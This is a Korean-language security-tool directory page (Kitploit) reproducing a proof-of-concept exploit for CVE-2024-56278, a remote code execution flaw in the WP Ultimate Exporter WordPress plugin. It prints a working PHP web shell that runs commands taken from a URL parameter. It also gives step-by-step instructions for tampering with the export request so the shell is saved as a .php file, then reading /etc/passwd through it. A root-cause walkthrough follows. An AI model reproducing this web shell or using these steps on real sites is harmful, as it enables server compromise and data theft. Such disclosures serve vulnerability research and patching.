Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-56278 — CVE-2024-56278에 대한 개념 증명 익스플로잇으로, WP Ultimate Exporter WordPress 플러그인의 원격 코드 실행 취약점을 악용하여 파일 업로드를 통한 PHP 웹셸 배포를 시연합니다. | Kitploit
도구/GitHubGitHub/dottak/cve-2024-56278
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPayload Development
GitHubdottak/cve-2024-56278

CVE-2024-56278

CVE-2024-56278에 대한 개념 증명 익스플로잇으로, WP Ultimate Exporter WordPress 플러그인의 원격 코드 실행 취약점을 악용하여 파일 업로드를 통한 PHP 웹셸 배포를 시연합니다.

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-56278

1️⃣ 구성 요소 유형

WordPress 플러그인

2️⃣ 구성 요소 세부 정보

구성 요소 이름 WP Ultimate Exporter

취약한 버전 <= 2.9.1

구성 요소 슬러그 wp-ultimate-exporter

구성 요소 링크 https://wordpress.org/plugins/wp-ultimate-exporter/

3️⃣ OWASP 2017: TOP 10

취약점 클래스 A4: 안전하지 않은 설계

취약점 유형 원격 코드 실행 (RCE)

4️⃣ 사전 요구 사항

관리자

5️⃣ 취약점 세부 정보

👉 간단한 설명

WP Ultimate Exporter 플러그인은 WP Ultimate CSV Importer 플러그인의 애드온입니다. 이 플러그인은 모든 게시물, 제품, 주문, 환불 및 사용자 데이터를 CSV, XLS, XML 및 JSON 형식으로 내보낼 수 있게 해줍니다. 내보낼 때 파일이 업로드 경로에 생성되며, 플러그인은 해당 파일의 내용만 사용자에게 전달합니다.

WP Ultimate Exporter 플러그인 버전 2.9.1 이하에서 데이터 내보내기를 요청할 때, 요청 데이터의 파일 확장자가 PHP로 설정된 경우 업로드 경로에 PHP 파일이 생성됩니다. 따라서 생성된 파일의 내용에 PHP 구문이 포함되어 있으면 해당 파일에 접근할 때 PHP 구문이 실행되므로 원격 코드 실행(RCE) 취약점이 발생합니다.

👉 재현 방법 (PoC)

⚠️ 'WP Ultimate Exporter' 플러그인은 'WP Ultimate CSV Importer' 플러그인의 애드온이므로 두 플러그인을 모두 설치해야 합니다.

  1. 코드 편집기(단축키: ⇧ ⌥ ⌘ M)를 사용하여 다음 내용으로 새 게시물을 작성합니다:

    root@kitploit:~
    <pre>
    	<?php
    	    if(isset($_GET['cmd']))
    	    {
    	        system($_GET['cmd']);
    	    }
    	?>
    </pre>
    
  2. WP Ultimate Exporter 플러그인의 'Export' 탭으로 이동합니다. WP Ultimate CSV Importer 플러그인 대시보드(/wp-admin/admin.php?page=com.smackcoders.csvimporternew.menu)에서 'Export' 탭을 클릭하여 접근할 수 있습니다.

  3. 프록시 도구(예: BurpSuite)를 실행하여 요청 패킷을 가로채고, Intercept를 활성화한 상태에서 다음 단계를 진행합니다.

  4. 다음으로, 'Select the module to Export Data'에서 'Posts'를 선택하고 다음 단계로 진행합니다.

image

  1. 그런 다음, 'To export data based on the filters'에서 다음 항목을 설정하고 'EXPORT' 버튼을 클릭합니다.
    • Export File Name 'webshell' 입력
    • Advanced Settings 'CSV' 선택

image

  1. 이 시점에서 데이터를 내보내기 위해 /wp-admin/admin-ajax.php URL로 POST 메서드 요청이 전송됩니다. 요청 데이터의 exp_type 값을 csv에서 php로 변경한 다음 Forward를 클릭합니다.

image

  1. 브라우저 주소 표시줄에 /wp-content/uploads/smack_uci_uploads/exports/webshell.php?cmd=cat /etc/passwd를 입력하여 WordPress가 설치된 서버의 /etc/passwd 파일 내용을 표시합니다. 이는 RCE 취약점을 입증합니다.

image

👉 추가 정보 (선택 사항)

[취약점 원인]

WP Ultimate Exporter 플러그인에서 데이터를 내보낼 때 /wp-content/plugins/wp-ultimate-exporter/exportExtensions/ExportExtension.php 파일의 parseData 함수가 호출됩니다.

이 시점에서 내보내기 데이터 형식을 결정하는 요청 데이터 exp_type에 대한 필터링이 수행되지 않으며, 해당 값이 멤버 변수 $this->exportType에 직접 삽입됩니다.

image

이후 proceedExport 함수가 호출되어 데이터를 파일로 저장합니다. 이 시점에서 파일 저장 경로를 지정하는 변수 $file을 초기화할 때 멤버 변수 $this->exportType도 필터링 없이 사용됩니다.

image

이후 변수 $file에 저장된 파일 경로가 file_put_contents 함수의 인수로 전달되며, 이 시점에서 요청 데이터 exp_type에 지정된 확장자가 직접 적용된 상태로 파일이 저장됩니다.

image

따라서 웹 셸 코드가 포함된 게시물 데이터가 PHP 파일로 저장되고 해당 파일에 접근하면 PHP 코드가 실행되므로 원격 코드 실행(RCE) 취약점이 발생합니다.

image

[PoC 코드 구현 및 실행]

  1. 편집기에서 PoC 코드를 열고 WordPress 사이트 주소와 관리자 자격 증명을 입력합니다.

image

  1. 그런 다음 다음 명령을 입력하여 PoC 코드를 실행합니다.

    필수 모듈 requests

    root@kitploit:~
    python poc.py
    

    image

6️⃣ Exploit 데모

video

7️⃣ 참고 자료

  • https://nvd.nist.gov/vuln/detail/CVE-2024-56278
도구 다운로드